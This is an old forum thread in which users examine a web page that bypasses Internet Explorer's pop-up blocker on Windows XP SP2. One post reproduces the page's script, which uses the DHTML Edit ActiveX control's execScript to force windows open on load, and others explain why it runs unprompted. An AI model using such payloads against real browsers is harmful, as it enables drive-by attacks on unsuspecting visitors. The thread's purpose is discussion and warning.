r3d1405241470 0 Report post Posted December 23, 2004 someone just show me this one.if your using xp sp2. visit the link below with your ie, protected with built-in firewall and pop-up blocker and see what happen http://forums.xisto.com/no_longer_exists/ Share this post Link to post Share on other sites
G_Man10110 0 Report post Posted December 23, 2004 I haven't gone to the link, but by the looks of it, it kind of seems as if a virus is going to infect us or something if we go there. I have already rebooted my XP's drivers too may times for me to go to a site where I am just asking for a virus. Share this post Link to post Share on other sites
jwcgator 0 Report post Posted December 23, 2004 well this is the source, I will bold the bad stuff. <body onload="setTimeout(' main() ',1000)"> <object id="x" classid="clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A" width="1" height="1" align="middle" > <PARAM NAME="ActivateApplets" VALUE="1"> <PARAM NAME="ActivateActiveXControls" VALUE="1"> </object> <script> // 10.11.04 http://www.editive.com/ function shellscript() { open("http://forums.xisto.com/no_longer_exists/;); showModalDialog("http://forums.xisto.com/no_longer_exists/;); } function main() { x.DOM.Script.execScript(shellscript.toString()); x.DOM.Script.setTimeout("shellscript()"); } </SCRIPT> <br><br><br><br><br><br><center><img src=nocigar.gif><br><br><FONT FACE=ARIAL SIZE 12PT>NO CIGAR !</FONT></center> That Is why I use FireFOX Share this post Link to post Share on other sites
qwijibow 0 Report post Posted December 23, 2004 Whats meant to happen if you run it with IE... ?on my Linux system it just says "No cigar" and applauds me.. i take it i passed ^_^is this a bug that wasnt fixed by SP2, and will also affect Sp1... or was it a bug introduced by SP2 ? Share this post Link to post Share on other sites
MajesticTreeFrog 0 Report post Posted December 23, 2004 I get the same thing, No cigar and applause. But then again I am using firefox on my mac. Share this post Link to post Share on other sites
cryptwizard 0 Report post Posted December 23, 2004 On MSIE these Windows go flying all over you screen and they say "boo".BTW, I was just testing it, I usally use firefox. Share this post Link to post Share on other sites
daniel151405241469 0 Report post Posted December 23, 2004 looking through that script, it seems that it sets a timeout that opens the URL http://forums.xisto.com/no_longer_exists/ every 1000ms (1 second). i haven't actually tested it in IE since i use Opera. AND if you want to know, activex class id '2D360201-FFF5-11d1-8D03-00A0C959BC0A' (the object used in the script) is the DHTML Edit Control. Microsoft has marked this 'safe for scripting', meaning that internet explorer will run the activex control without even asking you... regardless of the security settings (i think). Share this post Link to post Share on other sites
r3d1405241470 0 Report post Posted December 23, 2004 it's an activex, and that features is only for ie and it won't work for non-ie browser. the link also install a malware automatically and really kick someones *bottom* when visited that with ie browser. Share this post Link to post Share on other sites
Hercco 0 Report post Posted December 27, 2004 Is it just me or is this all to easy to do? Dammit by just using a right class id you can run scripts even if the user has opted not to do so. Did I misunderstand something or are things this bad with MS? Share this post Link to post Share on other sites
